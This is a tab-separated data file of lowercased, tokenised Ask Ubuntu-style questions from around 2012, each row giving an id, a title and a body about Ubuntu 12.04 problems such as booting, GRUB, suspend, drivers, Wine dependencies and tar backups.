177606	unable to boot ubuntu 12.04 , system does not respond to f ? keys to boot from cd	i 'm trying to dual boot my new laptop , downloaded the latest version of ubuntu 64 bit , burnt it to a dvd , it boots as it 's supposed to on my brother 's laptop , not on mine , i did everything i could , modified the boot configuration using easybcd , still does n't boot into ubuntu , from the boot menu i only see windows 7 , when i installed linux mint 2 days ago it booted correctly , had to remove it because i faced installation errors and switched to ubuntu to try it , it just does n't boot no matter what . how can u fix this ? u do n't see no errors and i have pressed all the f ? buttons , i just see windows .
177607	changing the editor pida ide uses	i recently tried the pida ide , and when starting up i selected vim , i now want to use emacs , but there is no option so i tried reinstalling , purging and nothing has worked ... how can i change the editor pida uses ?
177609	partial distro upgrade causes gnome-shell-extensions to be incompatible ?	today i did a partial upgrade through the update manager , and in the process it uninstalled gnome-3 . i reinstalled gnome-3 and now i can not install any shell extensions because they are `` out of date , '' even though i am on the same version of gnome that i was on before the update ( 3.4.2 ) . only the default extensions work , such as user-themes , dock , and places . i am trying to get the mediaplayer extension to work but i ca n't find a version anywhere that is compatible . can i fix this in the source code of the extension and build it myself ?
177612	ram on an ubuntu mac mini ?	i have a 2011 mac mini with 4gb ram , i 'm planning on wiping it and installing ubuntu . but since i 'm gon na be running a gaming server on it , ( minecraft ) , i wanted to know how much ram the computer can take , this means the limits of the mac mini hardware with the amount of ram ubuntu supports . so does anybody know what the highest ram this combo can take ?
177613	how do n't autostart all programs , that was opened before shut down	when i login , all programs that was not closed , before i turn off the computer , starts . how can i do n't start them , but start some list of programmes ? ( no matter , was they opened or not )
177616	wired keyboard and mouse not working anymore	i recently upgraded from 11.10 to 12.04 and other than twinview problems it seemed to be working . while trying to fix the twinview issues , i rebooted the computer and the keyboard and mouse no longer worked . i can hit f12 during boot to pick boot device but once the login screen hits neither work . when i ssh into the machine , lsusb shows that both the keyboard and mouse are seen . any suggestions on getting them working ? after looking in the xorg.0.log file i see this . [ 60.280 ] ( ii ) config/udev : adding input device logitech optical usb mouse ( /dev/input/event2 ) [ 60.280 ] ( ii ) no input driver specified , ignoring this device . [ 60.280 ] ( ii ) this device may have been added with another device file . [ 60.280 ] ( ii ) config/udev : adding input device logitech optical usb mouse ( /dev/input/mouse0 ) [ 60.280 ] ( ii ) no input driver specified , ignoring this device . [ 60.280 ] ( ii ) this device may have been added with another device file . [ 60.280 ] ( ii ) config/udev : adding input device dell dell quietkey keyboard ( /dev/input/event3 ) [ 60.280 ] ( ii ) no input driver specified , ignoring this device . [ 60.280 ] ( ii ) this device may have been added with another device file .
177620	how does chromium pick a mime-type handler ?	chromium does n't seem to have any obvious mime-type configuration settings , which strikes me as a little broken . my specific problem is that there are a number of filetypes that chromium plays in-browser that i 'd rather either download or associate with whatever my system-default mime-type would suggest . can this be done ? and here are two related ( unanswered ) questions , asking if there 's a way to tell chromium not to play mpeg video and mp3 files .
177623	rhythmbox can not be installed because of unmet dependencies ?	why am i unable to install this ? how can i get these dependencies ? the following packages have unmet dependencies : rhythmbox : depends : libgtk-3-0 ( > = 3.2.0 ) but 3.4.2-0ubuntu0.4 is to be installed depends : librhythmbox-core6 ( = 2.97-1ubuntu1~precise1 ) but 2.97+git20120801.0a3cb152-0ubuntu1~12.04~ricotz0 is to be installed depends : rhythmbox-data ( = 2.97-1ubuntu1~precise1 ) but 2.97-1ubuntu1~precise1 is to be installed depends : gir1.2-rb-3.0 ( = 2.97-1ubuntu1~precise1 ) but 2.97-1ubuntu1~precise1 is to be installed
177624	battery dies quickly in 12.04	i am new to ubuntu . i use samsung laptop . the battery dies quickly while i am using ubuntu 12.04 . the charge holds good for hardly 1hr 45mins . on the contrary , i get 3hr 30min while using windows os . i have tried reducing the brightness but it did n't effect much . any ideas ?
177628	suspend and resume is n't working on an asus x54cbbk3	i am more or less a complete linux noob , and using 12.04 for the first time . everything works great , and i am very happy , but there is one exception : suspend wo n't resume . every time i suspend my computer , ( whether by clicking suspend or by closing the lid ) it goes to a black screen ( with the backlight on ) but there is no way to wake it up . i 've tried doing fn+f8 to see if the screen was off , but it did n't work . i tried keyboard , mouse and power button , but nothing works , and i have to shut down and restart .
177636	/dev/mapper/cryptswap1 problem on boot ?	just before the boot logo fades away and the login screen shows , there 's a little message that says there was some kind of problem with /dev/mapper/cryptswap1 and i have to press s or m or something , then everything continues as normal and i do n't really know what 's going on . so , is anything seriously wrong ( because the computer is still functioning fine ) ? if so , how do i fix it , and if not , how do i stop the message from showing ? thanks .
177637	usb ports , dvd drive , sd slot not mounting	the other day my ubuntu 12.04 system was working fine . i could put in a flash drive and move files back and forth . i put in a cd and ubuntu prompted me what to do . after turning on my computer and popping my flash drive in nothing happened , same with the cd . what can i do to fix this problem ?
177640	how to upgrade compiz to 0.9.8 or downgrade to 0.8.6 in 12.04 ?	for a very long time , i 'm experiencing this bug in compiz . it makes my windows flash , when rotating the desktop cube . none of the animations work properly execpt the wobbly windows . however the temporary fix i found on the bug page helped me to reduce the effects , but it 's not 100 % perfect . now they have totally fixed the bug in compiz 0.9.8 for quantal . i really need to get the official fix on my ubuntu 12.04 . do n't the lts versions get bug fixes ? sometimes my desktop cube/cylinder appears like this : none of this happened in lucid lynx : (
177642	how to turn on/off boot messages when ubuntu starts ?	is there a way to easily turn on/off showing the boot messages ( loading the services ) when ubuntu starts ? my machine uses wubi for boot-up . the reason i am asking is to figure out if the reason for the lockups is caused by events which happen a boot-up . i see messages which are cleared out before i can read them . if there is a place where all errors are logged , even when the booting file system is read , i would like to know so i can read them instead .
177647	why is firefox using archaic japanese characters instead of modern ones ?	this problem keeps coming back , no matter how many times i 've killed it . i am seeing undesired versions of japanese characters in my interface . ( particularly in firefox , if that makes a difference ) . for example , when looking at the word 七福神 , it looks to me like this : however , the characters should look like this ( taken from another computer ) : the difference is on characters two and three . in the top example they have 示 on the left side , whereas in the bottom example , they have ⺭ . i prefer to have the version that has ⺭ , especially since that 's the one used in modern japanese ( in fact , i have no idea why any font would bother using the version with 示 for japanese , or why such a font would be some kind of default in ubuntu ) . this exact problem is addressed in this question , but there are a few reasons why the solutions there do n't apply anymore . one is that the accepted answer is for ubuntu natty 11.04 , and the configuration interfaces shown do n't seem to exist anymore in ubuntu pangolin 12.04 . at least , not for me , using gnome classic . another issue is that the accepted answer alternately suggests editing /etc/fonts/fonts.conf , but that file clearly says at the top do not edit this file . it will be replaced when fontconfig is updated . i could not figure out what fontconfig is - it does n't seem to be a program . the most important issue is , that the ideal would be that when setting system fonts , what i want to do is be able to specify a default english font and a default japanese font . the only place i 've found to specify system fonts is here under system tools - > preferences - > advanced settings : the problem is that it does n't differentiate between english and japanese font displays . in other words , what is happening is that my default system font for most situations is ubuntu . when a character ca n't be found in ubuntu , which is almost certainly always the case when the character is japanese , it defaults to some other font for japanese that i ca n't find or control . so , what i can do for now is switch all the default fonts to a japanese one , but then i sort of have the opposite problem - the way a lot of japanese fonts handle english characters kind of sucks . for example , i like the meiryo font for japanese , but it renders english characters so wide it 's ridiculous . bottom line : how can i set a default font for english ( such as ubuntu ) , and then a default japanese font ( such as meiryo ) for when ubuntu needs to render a japanese character ?
177650	shutdown button not working	i have 12.04 installed on my laptop . it was working perfectly until yesterday . since then , no matter whether i choose restart shutdown or suspend option from gui , my computer suspends . please give suggestions .
177651	how do i show grub when resuming from suspend ?	i have a sony vaio laptop , that came pre-installed with windows 7 . i resized the windows partition , then set up a dual boot scenario with ubuntu . i 've noticed that when i run windows and put the computer to sleep ( i.e . shut the lid ) , and later resume it will sometimes show the grub menu . if i select the windows 7 entry , it will resume as expected . if i select ubuntu , then later restart , then select windows , windows will again resume from the last state . the behaviour seems to be based on the amount of time it has been inactive . for example , if i shut the lid and the re-open straight away , it will return to windows . on the other hand , if i shut the lid and come back some hours later , grub will be displayed . on the other hand , with i put ubuntu to sleep , it will always just go straight to ubuntu . is the behaviour i experience when running windows - displaying grub , re-producible when running ubuntu ? why does this occur on windows ? can i disable the behaviour from windows , or is it out of my control ? how and where is the state saved - can i remove the state without rebooting back into windows and doing a hard reset , so that i can mount the disk ?
177652	disable vlc 's mpris plugin	i 'd like if possible to disable vlc from using the mpris interface . i use the gnome-shell media player extension and it also includes vlc in it which i dont want to . does anyone know how to do that ? ( disable vlc 's mpris support or hide vlc from the media player gnome-shell extension )
177653	how do i restore monitor resolution on my dell xps 15	i recently installed ubuntu 12.04 on my new dell xps 15 this one here . it has the ivy bridge processor with an nvidia card . i made the mistake of trying to install the nvidia proprietary driver . on reboot i got 640x800 resolution : - ( so i apt-get remove -- purge nvidia-current and it seems that the intel driver is now installed but i am stuck with 640x800 . normally i would have booted using live cd ( which has the correct resolution ) and copy the xorg.conf from the live boot to the hdd . but this does n't seem to work with 12.04 . i have added the modes `` 1920x1080 '' to the xorg.conf file but with no luck i have tried manually editing and also deleting the ~/config/monitors.xml with no luck i tried installing bumblebee with no luck oddly , if i plug an external monitor in the hdmi port , i can set the resolution correctly on that monitor . if i do xrandr in a terminal with the live cd it finds the correct resolutions , but when i try it from the install , it only returns 640x800 : - ( i would like to get my resolution back to native . any help would be greatly appreciated .
177656	can i make a live usb with 2 different versions of ubuntu ?	i have a laptop and a pc . my pc is very old having 1g ram and old dual core processor but my laptop is relatively new . i want to use 12.04 for laptop and 10.10 for my pc . is there a way i can add two different versions of ubuntu 12.04 ( 64 bit ) and 10.10 ( 32 bit ) to my usb at the same time ?
177659	how can i download the videos from youtube ?	i want to download some educational videos from youtube or any other web site . i am using ubuntu 12.04 . please explain how to do it .
177660	how to create a launcher for a game - wine	i have the game stronghold installed on my windows side of my computer . if i run it through wine , it works without the need to install it on linux ( which i intend to do as soon as i can borrow the disks from a friend . ) my question is , can i make a launcher for stronghold ... so that when i click it , it automatically runs through wine ... instead of me having to run it through wine every time ? thanks !
177663	is there a command like reisub that only restarts x ?	is there a command like ctrl + alt + sysrq + r e i s u b that only restarts x - or drops down to shell ( not a virtual console its broken ) ? between ubuntu , unity/gnome3 , and the kernel ( canonical-modified ) there are an uncountable number of stability regressions that are consistently added each update since the 2009 . it would n't bother me so much if i could just fix the problems as they happen without requiring a restart every couple hours . ( no , its not a hardware thing , it happens on several machines both old and cutting-edge which all can handle linux earlier than 2009 and windows great . )
177667	need to reinstall ubuntu 12.04 , but my computer does n't recognize my usb startup disk . ( dual boot )	i need to do a clean reinstall of 12.04 os . i do n't have a cd drive , and have created a usb startup flash drive . i am running dual boot windows 7 , and ubuntu 12.04 . the bios is booting from removable , but it does not seem to recognize the thumb drive , it goes straight to the grub menu . am i doing something wrong ? is there another way ?
177668	ubuntushowdown apps installation unable to locate package error	i recently heard about ubuntushowdown apps . there are some very nice apps which i really want to try . i am trying to install these apps by adding repositories as it is mentioned on their page . but at the completion of command , it is showing : unable to locate package < package name > for example , after running this command in terminal : sudo add-apt-repository ppa : brianrobles204/xkcd-browser sudo apt-get update sudo apt-get install xkcd-browser i am getting this at the end unable to locate package xkcd-browser please help . ubuntushowdown apps
177675	undo export cflags and export cxxflags change	i recently mistakenly executed some commands i 'd like to undo . in an attempt to compile flightgear 2.8 for ubuntu 12.04 i stupidly used the following commands from and os/x guide : export cflags= '' -g -o2 -fpic -arch i386 -arch x86_64 '' and export cxxflags= '' -g -o2 -fpic -arch i386 -arch x86_64 '' as well as cmake . -djpeg_factory=1 -dcmake_install_prefix=/usr/local i 've checked ~/.bashrc and nothing was changed there . where were these changes written ? how can i undo them ?
177682	restore ubuntu 's default settings without having to reinstall	i want to restore ubuntu 12.04 to it 's stock configuration , but i do n't want to reinstall or reformat my home partition . i do n't have a way to backup my files , which is why i do n't want to have to reinstall and reformat my hdd . is there a way to do this ? ?
177690	unity slow on ubuntu 12.04 with ati x1250 graphics card	i have an hp 6715b with ati x1250 graphics card . i am running ubuntu 12.04 and i observe that unity is running slowly . is that normal ? my system configuration is : 4gb ram and amd turion x2 1.9 ghz processor .
177695	why does radiance have gtklabel while ambiance does n't ?	i was looking at the gtk-widgets.css files in ambiance and radiance ( /usr/share/themes/theme_name/gtk-3.0/ ) after the recent light-themes update . one difference i noted in the section titled notebook is given below . ambiance : .notebook tab : active { color : @ fg_color ; } .notebook tab { color : shade ( @ bg_color , 0.48 ) ; } radiance : .notebook tab gtklabel : active { color : @ fg_color ; } .notebook tab gtklabel { color : shade ( @ bg_color , 0.48 ) ; } radiance has gtklabel but ambiance does n't . my question is : does anyone know the significance of gtklabel , and why one theme has it and the other does n't ?
177696	requesting url to gnome-shell integration plugin for firefox	please give me the link to download the gnome-shell integration plugin which will allow me to subsequently install gnome-shell extensions via the web browser . i just want the link to the plugin , i do not want to do apt-get dist-upgrade or reinstall gnome . the link to the plugin itself , should be available for all users to install . i ca n't find the link on google or in the plugin/addon section .
177698	`` sensors '' showing temps like 127째c	when i run `` sensors '' from terminal one of the readings is really really high : radeon-pci-0200 adapter : pci adapter temp1 : +127.5째c obviously it 's for the graphics card but i doubt it 's so hot . could it be it 's misconfigured ?
177707	unable to change unity app icon size with ccsm	i was unable to change launcher icon size from ccsm , i find configure part as i followed steps on this link but after log out / in again , the icon size did n't reduce . i 'm running latest ubuntu 12.04
177708	minecraft not downloading	i 've looked through a ton of pages about this and have n't found any information on the problem i 'm experiencing . for information i 'm using ubuntu 12.04 32bit desktop edition , fresh install . i downloaded the .jar file and executed it with no problems . the problem is the that the game will not download and update the required files to play the game . after logging in and hitting `` play demo '' it goes to a screen which shows the progress bar 80 % complete and says `` complete '' and then just stops . after going back to my home folder and looking at the .minecraft folder ; there is just and empty /bin folder and no files . i tried downloading the .exe file and running the game under wine , and i got the exact same problem . i tired turning off the ufw , no change . and for a comparison i tried installing starcraft 2 which worked , but it could not find the patch server , so i think it is some kind of network problem ? any help would really be appreciated this is starting to drive me crazy .
177713	how to make a launcher ( .desktop ) file that will open the desired file in a specific app ?	i basically want to make a launcher for my windows 7 vbox file . i tried the normal way of giving the path to the windows 7.vbox file in the .desktop file but that did not work ! maybe as it is not executable . but when i manually navigate to it from nautilus and click on it , the vm straight away starts windows 7 . how do i achieve this in the shortcut ? i also thought of first changing to the directory and then executing it but when i tried it in the command line it dint work . just windows\ 7.vbox gave me command not found and ./windows\ 7.vbox gave me permission denied and with sudo it gave command not found again . i am using oracle virtual box 4.1.12
177715	wireles network menu sometimes shows available networks , often does n't	when i open my laptop , it often does n't show the available networks . if i click on the icon in the gnome panel , i only see this : what i should see is this : fortunately , even though it usually does n't show the available connections , it still connects to one of them , and i can i can use the internet . however , sometimes it does n't , and when that happens , i have no way that i know of to select an available network , and that can be insanely frustrating . sometimes , and i do n't know what triggers it , after a while the menu will display all options , as i believe it should . but it does n't seem to be anything i can force or anticipate . why is the menu not always showing me the full menu , and how can i make it so that it does ?
177717	is bumblebee-project that lets you configure nvidia optimus completely safe to use ?	it 's working as expected ( ubuntu 12.04 x64 ) and i have no problems . however i 'm slightly worried about any possible damage to the hardware , i know it 's far fetched but it 's an unofficial workaround , does anyone know of any risks that come with this software , any criticism from hardware manufacturers ?
177724	not booting into grub ( boot-repair log included )	yesterday , after having resized and moved some of my partitions i have successfully enlarged my ubuntu partition but in the morning i wanted to launch the computer and ... one thing i get is the `` blinking beacon '' . i have tried booting into ubuntu 12.04 usb and it worked , the disk is working - i can access it 's files but i can not boot into it . i have tried using boot-repair but with the automated option i get no luck . this is the link to it 's log http : //paste.ubuntu.com/1155008/ can anyone help me on this ? i have been thinking on creating separate /boot partition in the beginning of the disk but i have some other windows related partitions there ( e.g . recovery partition ) and this might be problematic . edit after clicking restore mbr in boot-repair i can boot but only to windows : / another boot-repair log edit i have plugged in a usb stick in and installed my grub on it , then i was able to boot my ubuntu ( from hard drive ) with grub from usb stick . now , since i already have access to my system - how can i repair/restore grub from here ? ( or maybe even from anywhere else ) ?
177726	sound converter does n't convert at all . any clues ?	screen shots - i ran debug in the terminal as suggested from another forum .
177727	how do i enjoy unity 2d in ubuntu 12.10 with a computer that is capable of running unity 3d ?	in the upcoming ubuntu 12.10 - unity 2d will be removed . thanks to llvmpipe , a computer that is n't capable of running unity 3d is getting the same experience without the compiz effects . but what if i do n't want unity 3d at all ? i have a dell inspiron 1525 that 's capable to run unity 3d , yet it 's slow . very slow . unity 2d , however , is faster . how do i enjoy the snappiness of 2d from 12.10 ?
177730	is there a server app in ubuntu software center for php ?	i 'm a beginner learning php . i need a server and mysql . is there an app in ubuntu that i can download ? i think i have installed something with php5 server-side something . but when i clicked to use the app , it vanished . where did it go ?
177733	why winxp faster than xubuntu under virtualbox ?	i have two vms configured identically ( hardware wise ) , the only difference is that the windows xp one is uber fast and the xubuntu very slow . i know this is an open ended question , but would anyone have any hunches on why ?
177734	hard drive recovery , corrupt file system	my external hard drive ( 500gb wd `` my passport '' ) show 's no files , yet it is half full , i think it is also fat32 , not ntfs , as in , it was* ntfs i think , ( not 100 % sure , but i bought it ntfs , it should be ntfs ) and now it shows fat32 and my files can not be seen . what is the easiest and quickest way to get over 230gb of files back on this hard drive ? i do n't think i can fit all of my files on my internal hard drive , so i 'm not sure what to do . is there a way to back up specific files/folders ?
177736	how to set power setting to performance ?	in ubuntu 12.04 how do i set up the power settings to obtain maximum performance ( opposed to max battery life ) ?
177741	changing banshee 's `` recently added '' option	i use the banshee audio player and , for the most part , it does everything i need . however , i 'd love to be able to tweak the `` recently added '' list . basically , i buy more music than i can keep up with , and since banshee limits recently to being `` in the last month '' albums are dropping off the list before i get to them . is there a way to alter the time limit for `` recently '' ? if it 's a source code tweak then i 'm quite happy to make that and build my own deb file for installation .
177751	realtek rtl8191se crashes with intense networking	i 've been using ubuntu for a few weeks now , and since then i 've been unable to solve my wireless problem . every time time i run some intense networking like dl and streaming my wireless crashes , or if i just give it enough time it crash as well . my only option is to reboot my computer . i 've been trying a bunch of different solutions to no avail . here what i get when i run iwconfig when it 's still working : lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' freebox_ispcgs '' mode : managed frequency:2.452 ghz access point : 00:24 : d4:63:66:64 bit rate=72.2 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=-35 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . my computer is a compaq presario cq56 with a rtl8191seva wireless lan controller
177752	why does synaptic want me to uninstall half my programs just to get wine ?	i have noticed it lately , so i am suspicious it is something to do with being on a 64 bit install . i especially notice when trying uninstalling something i do n't want by kde ; i seem to have to choose between installing them all , or keeping the one i do n't want . wine seems to want me to uninstall my entire desktop . it is not good enough to be making demands like that of me so i would be interested to know if there is a way to bypass it . i like to install winetricks specifically but it would be good to know the workaround for similar situations . i am using lubuntu 64bit . here 's what happens when i try to install winetricks sudo apt-get install winetricks reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libsaevt3 libopenal1 libopencc1 libkresources4 libsoundtouch0 libkldap4 libtwolame0 libradiusclient-ng2 libva-x11-1 libzbar0 xsltproc libzvbi-common libksane0 authbind libiksemel3 libkxmlrpcclient4 fcitx-modules libconfig-inifiles-perl libgmime-2.6-0 tellico-data swh-plugins libpload4 libsbsms10 libsrtp0 libpg-java gstreamer0.10-fluendo-mp3 libvotequorum4 libaspectj-java libsam4 fcitx-ui-classic libzvbi0 libportsmf0 libcfg4 libconfdb4 libcoroipcc4 libflac++6 libboost-program-options1.46.1 libhsqldb-java libsqlite0 libslv2-9 libcoroipcs4 clamav-base libopenal-data liblogsys4 libclamav6 texlive-bibtex-extra libboost-iostreams1.46.1 tofrodos libcpg4 freetds-common libqjson0 libosgi-foundation-ee-java gstreamer0.10-ffmpeg aspectj libexempi3 libkabc4 libvpb0 libcurl3 libyaz4 libgme0 libspandsp2 freepats ladspa-sdk libosgi-core-java libspeexdsp1 libevs4 audacity-data libkcal4 libboost-thread1.46.1 libwildmidi1 asterisk-moh-opsound-gsm libserp-java libkate1 libcdaudio1 libmimic0 libsybdb5 libsaclm3 libkmime4 libwildmidi-config libksane-data libmad0 libpq5 libtommath0 libquorum4 liboil0.3 fcitx-module-dbus fcitx-module-x11 asterisk-config libvamp-hostsdk3 libkpimutils4 libcelt0-0 libodbc1 libgstreamer-plugins-bad0.10-0 tellico-scripts libtotem-pg4 libsvn-perl fxload libmpcdec6 asterisk-core-sounds-en-gsm libcorosync4 libresample1 libofa0 libpostgresql-jdbc-java vpb-driver-source unixodbc use 'apt-get autoremove ' to remove them . the following extra packages will be installed : fonts-horai-umefont fonts-unfonts-core libao-common libao4 libgl1-mesa-glx libpng12-0 : i386 libsox-fmt-ao ttf-unfonts-core unixodbc zlib1g : i386 suggested packages : libroar1 libsndio0 roaraudio-server recommended packages : wine1.4 wine cxoffice5 cxgames5 the following packages will be removed alsa-firmware alsa-firmware-loaders alsa-utils ant1.7-gcj asterisk asterisk-modules asterisk-voicemail audacious audacious-plugins audacity bluez-alsa browser-plugin-gnash chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg-extra gcj-4.6-jre-lib gnash gnash-common gnome-screenshot gstreamer0.10-alsa gstreamer0.10-plugins-bad kbibtex kde-runtime kile kile-l10n konsole libasound2 libbonoboui2-0 libcanberra-gtk3-0 libcanberra0 libesd0 libflite1 libfluidsynth1 libgcj-bc libgcj12 libgl1-mesa-swx11 libgl1-mesa-swx11-dbg libglu1-mesa libgmlib0 libgmtk0 libgnome2-0 libgnomeui-0 libjmathtex-java-gcj libkcddb4 libkonq-common libkonq5abi1 libokularcore1abi1 libportaudio2 libpurple0 libsasl2-modules libsdl1.2debian libsox-fmt-alsa lubuntu-core lxde-core lxpanel lxpanel-dbg lxpanel-indicator-applet-plugin mplayer2 notification-daemon octave3.2 okular okular-extra-backends pdftk phonon phonon-backend-gstreamer pidgin pidgin-latex pidgin-microblog python-subversion subversion subversion-tools tellico update-notifier winefish xorg the following new packages will be installed fonts-horai-umefont fonts-unfonts-core libao-common libao4 libgl1-mesa-glx libpng12-0 : i386 libsox-fmt-ao ttf-unfonts-core unixodbc winetricks zlib1g : i386 some of them look blatantly like they are 32bit but i will be impressed if anyone knows how to wade through that ! i should mention that lubuntu-core lxde-core lxpanel are quite important to me .
177753	virtualbox hardware virtualization in ubuntu as guest os	i have a windows 7 64 bit and my cpu supports virtualization and i have enabled it . as a guest os i have installed ubuntu 64 bit and i checked hardware virtualization in virtualbox but after running this command egrep -c ' ( vmx|svm ) ' /proc/cpuinfo it returns 0 meaning my hardware does n't support virtualization . what can i do ?
177759	how to bridge mobile broadband and wifi networks ?	i 'm using a mobile broadband device/ usb modem to connect my computer to the internet.when i was using windows 7 , i made my laptop a wifi hotspot , so i could surf internet on my ipod touch . now i have moved to ubuntu 12.04 . i read the tutorials and did everythig i could and finally ended up with creating an ad-hoc network.. my ipod touch successfully connects to the ad-hoc network , but i 'm not getting any internet on the ipod . i thought it 's because i did n't bridge my mobile broadband connection with the wireless connection . so i changed my wireless connection 's method to `` shared to other computers '' in ipv4 settings . i ca n't download apps to my ipod touch . can someone help me share my mobile broadband connection over wifi ?
177762	moving an encrypted home folder to a new drive	is there something i should be taking in to account when moving an encrypted home directory to a new drive ? is it just enough to rsync the contents away , edit fstab etc ?
177771	where is mysqld.sock ?	i am missing mysqld.sock in ubuntu server 12.04 . neither locate nor even apt-file search mysqld.sock ( ran apt-file update before ) can find it . where is it ?
177772	installation taking unusually long time	i am installing 12.04 lts along side with windows 7 . this installer is taking unusually long time . it has stopped at a point for more than half an hour . it is telling restoring previously installed packages i am not sure about what 's happening . can you please suggest what has to be done ?
177775	wubi keeps freezing . reisub does n't work . any safe , easily undoable alternatives ?	i ran the installation for wubi from ubuntu.com on my acer aspire one 722 . it works fine every now and then , but more often than not the os freezes . every time it freezes i attempt the reisub method , but i do n't even get the console , just a frozen desktop . i ca n't pinpoint where exactly it freezes . i 've been able to run firefox and browse the web without problems multiple times , so from what i understand that discounts the problem with the network card others were having . but the freeze occurs either right away or after a while , maybe when i 'm downloading something . i have tried a fresh install , unless you think i should redownload the setup file again , but that seems pointless . the reisub method worked once . and i do n't even think it was when the os was frozen . i 'm pretty sure i just did that to make sure the method was n't some `` alt+f4 '' beeswax . i have considered using a virtual pc , but i do n't want to have to choose what fraction of my ram ( 2gb total ) goes to ubuntu , i want 100 % of it to go to ubuntu when i want to run ubuntu . when i want to run ubuntu , i want to run only ubuntu , and when i want to run windows , i want to run only windows . i really like the idea of choosing which os i want to boot into when i start up my computer , but i do n't want to have to do any partitioning , to do something i ca n't undo easily . is there an alternative to wubi that would allow me to do what i want , or is wubi my only way ? if it 's the only way , how can i make it work ? !
177776	how can i have a stock gnome 3 experience without having unity ?	i 'm looking for a way to have a stock gnome 3 experience in ubuntu 12.04 without having unity as well . what i 've tried so far : installed the server version of 12.04 . added the official gnome ppa for gnome 3 . install meta-package 'gnome ' . system is pretty broken . any advice ?
177779	restoring backup with deja dup from external hd	so , here 's the problem that i have with restoring . first , i backed up like everything . so i had place on the external hd for only one copy . i had to reinstall everything , but i did n't worry because i had a backup . but now , restoring does n't work and it starts to be annoying . so , i right click `` restore missing files ... '' . then i have the popup window from deja dup asking where is the backup . so , i select the external hd and either put nothing in `` folder '' or just put `` . '' . thinking that it should be the base to look for backups . in both cases , after a while scanning , i get : the volume `` filesystem root '' has only 139.7mb disk space remaining . but my partition `` /home '' has 799.6gb free . also , i just want to restore some files , i do n't need all of them . on my external hd , there 's a file called : duplicity-full.20120514t220834z.manifest . a text file . in it , i can see that everything is partitions in files of 52mb . so , small files are in one archive while very large files are split in multiple one . but i can see the exact list of file that i have . so , i 'm guessing that my backup is intact . what am i doing wrong ? is possible that it failes , even to list all the files , because i do n't have enough space left on my exthd ? why ca n't duplicity used another location to do that ?
177781	cant connect to wireless network automatically even though the box is checked !	my mum , who lives 400 miles away , has a problem with her wireless network with ubuntu 12.04 , upgraded from 11.04 on her acer netbook . the problem is that when she boots up her netbook she has to manually sign in to her wireless network despite ticking the automatically connect checkbox . it 's as if she does n't have the correct permissions to automatically sign in to her network . she is also unable to tick the 'available to all users ' checkbox . can anyone advise me further ? thanks in advance
177783	error : no such device grub rescue	summary : i keep getting the error : no such device grub rescue , after installing 12.04 ( erasing an old 12.04 installation beforehand , but using the old /home mount , from a different hdd ) i have two hdd 80 gb ( used for / ) and 250 gb ( used for /home ) i have tried boot error > no such device : grub rescue and also using live cd then installing boot-repair , none of them solves the problem . details from boot-repair : http : //pastebin.ubuntu.com/1155292/ question : i have tried a fresh install several time , and during these times , the two hdd mounted differently . i mean sometimes the 80 gb mounted as sda , sometimes as sdb . is this normal ? do you good guys at the ask ubuntu have any other way ?
177784	ca n't create ad-hoc network	i seem to have trouble creating an ad-hoc network in xubuntu . i 'm using the network manager to create the ad-hoc network . however , i ca n't then connect to the network using the same machine ( as the instructions say i should ) . on other devices i ca n't see the network at all . i 'm running the latest xubuntu and i have the following network card : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : sony corporation device 907b flags : bus master , fast devsel , latency 0 , irq 47 i/o ports at 3000 [ size=256 ] memory at c3404000 ( 64-bit , prefetchable ) [ size=4k ] memory at c3400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 i saw this related post but the problem is that i ca n't then connect to the network on the same machine .
177785	upgrade tree to 1.6 ?	i 'm trying to upgrade my version of tree to 1.6 on ubuntu 12.04 . i 've d'loaded , ran make and make install in the terminal using the sudo command . ~/tree-1.6.0 $ sudo make make : nothing to be done for `all ' . i 've already run sudo make here ~/tree-1.6.0 $ sudo make install install -d /usr/bin install -d /usr/man/man1 if [ -e tree ] ; then \ install -s tree /usr/bin/tree ; \ fi install doc/tree.1 /usr/man/man1/tree.1 what 's this output though ? it 's not updated . i 've checked the man page , and -du does n't work . how am i supposed to update tree if not via the terminal ?
177791	removing unwanted packages in ubuntu	i am running ubuntu 11.10 in my vps and it 's occupying quite a lot of my disk space , how do i remove the packages that are not being currently needed/used by any program ?
177793	can not resume from suspend 12.04	i suspend , i wake up . there is no network connectivity , there is no usb activity , there is no video output . the computer is turned on but nobody is home , just a black screen . i have a 4 port kvm and a geforce 9600 gso . i have tested connecting to this box via ssh , it times out my keyboard does n't respond when i try that session switch fix . i also tried a script that did the same thing essentially . both failed i have tested editing /etc/default/acpi-support ( save_video_pci_state=true did not work ) i have tested the acpi boot options . ( result ) pci=noacpi does n't work acpi=off disables suspend so i do n't even understand how that was a fix for someone . i attempted to use a fix posted here https : //wiki.ubuntu.com/x/quirks # force_pipe_a_quirk this broke x server so that it would n't run at all . i managed to disable it booting into recovery and editing the xorg.conf file with sudo nano . booting normally it simply would freeze on the splash screen i could n't get it to display what was going on so i had to restart . i did find one fix for a laptop ( which i do n't have ) that involved hdd power management stuff but i could n't figure out how to do something like that for my desktop . could n't find any help for this on irc , and my search results are n't pulling up anything new . still have n't found what i 'm looking for .
177797	system restored from a tar file . will the previously excluded folders be deleted after the restoration ?	i have two hard drives -- a system drive and a data drive . the path to the data drive is /storage . following this post , i went to the root of my filesytem and executed the following command : tar cvpzf backup.tgz -- exclude=/proc -- exclude=/lost+found -- exclude=/backup.tgz -- exclude=/mnt -- exclude=/sys -- exclude=/storage / note that i excluded the data drive ( -- exclude=/storage ) from the backup . now i want to restore the system drive but keep the data drive as it is . i should execute : tar xvpfz backup.tgz -c / from the how-to instructions , i was given the impression that the excluded folders will be disappeared after the restoration because i will need to recreate the folders i excluded . i am worried that the restoration will erase everything in the data drive because there is no /storage in the tar backup file . is this a valid concern ?
